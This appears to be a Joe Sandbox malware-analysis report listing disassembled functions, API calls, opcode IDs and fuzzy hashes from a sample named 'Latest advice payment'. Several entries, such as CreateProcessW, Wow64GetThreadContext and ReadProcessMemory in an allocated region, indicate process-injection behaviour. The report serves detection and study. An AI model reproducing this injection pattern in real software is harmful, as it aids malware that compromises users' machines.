                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: 68076e2b06fd173c1b257062e26ec5e6964edd42d2a51324351b83b2ebe0dee8
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: 48E012B1602A024ACB24B5B8AA44FA31FEC6FD8352B14091DB80EE7186CE64FC438324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: c676e0c78b24744335755373d5d817ecf88510b547316d6cd9f00f23851eea0f
                                                            • Instruction ID: 74baafa22650fa9f7f81a67fb5d6d5b86cffcb5164f45dc1bad64db2374f311d
                                                            • Opcode Fuzzy Hash: c676e0c78b24744335755373d5d817ecf88510b547316d6cd9f00f23851eea0f
                                                            • Instruction Fuzzy Hash: 9E223670508242DFDB24DF14C494A6ABBE1BF85304F14896DF88A9B362DB35ED85DF82
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: ccd0d0ebda328ac4130251cc1bf81efcd89262258acc08ba6e2fe02fa34a6de9
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 0A31B6B160460AAFC714DF68C8D1D69FBA9FF483147158629E919CB391EB30ED50CB90
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00564834
                                                              • Part of subcall function 0058336C: __lock.LIBCMT ref: 00583372
                                                              • Part of subcall function 0058336C: DecodePointer.KERNEL32(00000001,?,00564849,005B7C74), ref: 0058337E
                                                              • Part of subcall function 0058336C: EncodePointer.KERNEL32(?,?,00564849,005B7C74), ref: 00583389
                                                              • Part of subcall function 005648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00564915
                                                              • Part of subcall function 005648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0056492A
                                                              • Part of subcall function 00563B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00563B68
                                                              • Part of subcall function 00563B3A: IsDebuggerPresent.KERNEL32 ref: 00563B7A
                                                              • Part of subcall function 00563B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006252F8,006252E0,?,?), ref: 00563BEB
                                                              • Part of subcall function 00563B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00563C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00564874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 69dca8701db2d22c0a055146bbd737c5d878eb451f5049bf3990a04e6f2b4d55
                                                            • Instruction ID: e4971f4c0874c6c8bac14186ce7ff1b1848db9f6f3a063e623a4e6031b2212fd
                                                            • Opcode Fuzzy Hash: 69dca8701db2d22c0a055146bbd737c5d878eb451f5049bf3990a04e6f2b4d55
                                                            • Instruction Fuzzy Hash: 88118E71904742DBD720EF28DC4991ABFE9FBD4750F10891EF481972B1DB709649CB91
                                                            APIs
                                                              • Part of subcall function 0058571C: __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058571C: __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058571C: RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            • std::exception::exception.LIBCMT ref: 00580DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00580E01
                                                              • Part of subcall function 0058859B: RaiseException.KERNEL32(?,?,?,00619E78,00000000,?,?,?,?,00580E06,?,00619E78,?,00000001), ref: 005885F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 53db336047fa4dc4eddeca19b16039f96fee81e5619bda36842c89d4d4a31a3c
                                                            • Instruction ID: a06733eccdbdc470ba4f20ee2b1d0e0316e178052fd935674637e4901b7e12b2
                                                            • Opcode Fuzzy Hash: 53db336047fa4dc4eddeca19b16039f96fee81e5619bda36842c89d4d4a31a3c
                                                            • Instruction Fuzzy Hash: 16F0D17150021E66CB10BAA4EC099EF7FACFF01350F000825FD05F6291DF709A8583D1
                                                            APIs
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • __lock_file.LIBCMT ref: 005853EB
                                                              • Part of subcall function 00586C11: __lock.LIBCMT ref: 00586C34
                                                            • __fclose_nolock.LIBCMT ref: 005853F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: fcb91f0dab22ab33d185babec6153c066873494c057b54b74510ec69c57f2c70
                                                            • Instruction ID: 3973709dd12c382c7005a0bad847f7676f1b512e78605fd7b1ab9b64e1d8887b
                                                            • Opcode Fuzzy Hash: fcb91f0dab22ab33d185babec6153c066873494c057b54b74510ec69c57f2c70
                                                            • Instruction Fuzzy Hash: 58F09631801A069ADB117F6598097BD6EA0BF81375F658504EC64BB1C1DFBC8A415B51
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010A3DDB
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010A3E71
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010A3E93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                            • Instruction ID: c4d24525a44fa5818b7fa34aa3dd90750b911163c0203e3f251497d8e849b1b7
                                                            • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                            • Instruction Fuzzy Hash: 0812DC24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 2a2743bb16d8ea25723568126836772772c06e3175869cc0e3cb73343c0a3ea5
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: C2310470A001059FD798EF08C494A69FBA6FF49300B24A7A5E84AEB391D731EDC5DBC0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 29b7b392741d79de8631595ff9f98e7168ea652d895ecc0fc186fe75f14401ad
                                                            • Instruction ID: 070b7c0362dd4a6eb2c1267277cc6ac3463e3f1a674d3d43d5a4c9668933dca6
                                                            • Opcode Fuzzy Hash: 29b7b392741d79de8631595ff9f98e7168ea652d895ecc0fc186fe75f14401ad
                                                            • Instruction Fuzzy Hash: 6941D5745043519FDB14DF14C498B1ABFE1BF85318F0988ACE89A9B762D732E885CF52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6dc0f0f7fa145587e87b5c5b0772eabb731544f87c6f5b3b363908ad286559ef
                                                            • Instruction ID: 5712f6a77f7ae2962508d67b473c4677a97970983a3897cdad1682dba4c41cbf
                                                            • Opcode Fuzzy Hash: 6dc0f0f7fa145587e87b5c5b0772eabb731544f87c6f5b3b363908ad286559ef
                                                            • Instruction Fuzzy Hash: 59210672604A09EBDF14DF25E8426A97FB9FF58350F25886EE886C61A0EB3089D0D745
                                                            APIs
                                                              • Part of subcall function 00564BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00564BEF
                                                              • Part of subcall function 0058525B: __wfsopen.LIBCMT ref: 00585266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E0F
                                                              • Part of subcall function 00564B6A: FreeLibrary.KERNEL32(00000000), ref: 00564BA4
                                                              • Part of subcall function 00564C70: _memmove.LIBCMT ref: 00564CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: bcff38051ce6988cd1b67e39c97a2f6d652ef022225bb8ec1f46949e40668c40
                                                            • Instruction ID: 5bef19135a19b4ab6397fe1d1987d999c3f083291133b372d61cd9851942443f
                                                            • Opcode Fuzzy Hash: bcff38051ce6988cd1b67e39c97a2f6d652ef022225bb8ec1f46949e40668c40
                                                            • Instruction Fuzzy Hash: C411A731640206ABCF15BF74CC1AFAD7FA9BF84750F108829F541A7191DE719D059F61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 4b6b11f8aae71f7d640851ac51f8ad0b1693f04a2c01de82834926963c4cb401
                                                            • Instruction ID: 109f22dd48cd1afd167c7e83b12c4cb6247e4605b768d5b8983c59586b9a35d6
                                                            • Opcode Fuzzy Hash: 4b6b11f8aae71f7d640851ac51f8ad0b1693f04a2c01de82834926963c4cb401
                                                            • Instruction Fuzzy Hash: 0A21F474508342DFDB54DF64C444A1ABBE5BF88314F05896CF98AAB762D731E809CF92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 764d19061aae93da2a2e37bd39a30dfaa5a115982b79c77d832f6c7cc35e9409
                                                            • Instruction ID: 4c817132d08bfcc060545b73eed6f2ec02b97380e8af91b1d1959b4fb1812931
                                                            • Opcode Fuzzy Hash: 764d19061aae93da2a2e37bd39a30dfaa5a115982b79c77d832f6c7cc35e9409
                                                            • Instruction Fuzzy Hash: 2901DB72204706AED321AF78C806E677F98FB44760F108529F91ACB1D1EA32E8448790
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 005848A6
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: cb65415e710e7cfcd4581140f5c963c2f3ee12ee493a232fbc614f0b5d1b5e4d
                                                            • Instruction ID: 1fa35128463262896d419a6de8216d2d50c494cfef37429d8bc166d4531f0dfd
                                                            • Opcode Fuzzy Hash: cb65415e710e7cfcd4581140f5c963c2f3ee12ee493a232fbc614f0b5d1b5e4d
                                                            • Instruction Fuzzy Hash: F4F0AF3190160BABDF11BFA48C0A7AE3EA1FF80325F558414FC24BA192CB788951DF51
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 824096ccb938acb4dae4a4483d94f2eafbe7fba9a8f570bd473ea237120593e2
                                                            • Instruction ID: 4c6e8f38659a5748f901cc5084216322afccc94717ddd66178eb78f7fb5ed708
                                                            • Opcode Fuzzy Hash: 824096ccb938acb4dae4a4483d94f2eafbe7fba9a8f570bd473ea237120593e2
                                                            • Instruction Fuzzy Hash: 38F01571501B12CFCB389F64E494812BBE9BF543293208A3EE1D683620C7339C84DF41
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005807B0
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: e4fde00c0d6b514e29e8c55ac8a6240a8e6ae027abbcf2e9f49232612cdefa21
                                                            • Instruction ID: 097db1b86d98c7e1d08db9d86e0a678e3b6e2283631e5d72fac8594b1fd9b6cb
                                                            • Opcode Fuzzy Hash: e4fde00c0d6b514e29e8c55ac8a6240a8e6ae027abbcf2e9f49232612cdefa21
                                                            • Instruction Fuzzy Hash: 58E0863690412957C72096589C09FEA779DEBC86A0F0441B5FD08D7254D9609C808690
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: 4695ea48b19ac0ef543e8d4f4806b9c92284b7ef109eb7402683cb7fc96bebf8
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: D1B0927A44020C77CE012A92EC02A493F19AB81764F408020FF0C28162AA73A6649A89
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction ID: 1ce594d06d2fa660aabc4753950d56b879f88c7851019c94b8df4dc4994d4e19
                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction Fuzzy Hash: 84E0BF7494010DEFDB00EFE4D6496DE7BB4EF04301F1005A1FD05D7681DB709E548A66
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 3a9236443e1570fcacae5d7b62bd35e23ea76bf8df677a8c160a9468f78bf60f
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: ECE0E67494010DDFDB00EFF4D6496DE7FB4EF04301F100161FD01D2281D6709D508A62
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005ECB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005ECB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005ECBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005ECC00
                                                            • SendMessageW.USER32 ref: 005ECC29
                                                            • _wcsncpy.LIBCMT ref: 005ECC95
                                                            • GetKeyState.USER32(00000011), ref: 005ECCB6
                                                            • GetKeyState.USER32(00000009), ref: 005ECCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005ECCD9
                                                            • GetKeyState.USER32(00000010), ref: 005ECCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005ECD0C
                                                            • SendMessageW.USER32 ref: 005ECD33
                                                            • SendMessageW.USER32(?,00001030,?,005EB348), ref: 005ECE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005ECE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005ECE60
                                                            • SetCapture.USER32(?), ref: 005ECE69
                                                            • ClientToScreen.USER32(?,?), ref: 005ECECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005ECEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005ECEF5
                                                            • ReleaseCapture.USER32 ref: 005ECF00
                                                            • GetCursorPos.USER32(?), ref: 005ECF3A
                                                            • ScreenToClient.USER32(?,?), ref: 005ECF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 005ECFA3
                                                            • SendMessageW.USER32 ref: 005ECFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 005ED00E
                                                            • SendMessageW.USER32 ref: 005ED03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005ED05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 005ED06D
                                                            • GetCursorPos.USER32(?), ref: 005ED08D
                                                            • ScreenToClient.USER32(?,?), ref: 005ED09A
                                                            • GetParent.USER32(?), ref: 005ED0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 005ED123
                                                            • SendMessageW.USER32 ref: 005ED154
                                                            • ClientToScreen.USER32(?,?), ref: 005ED1B2
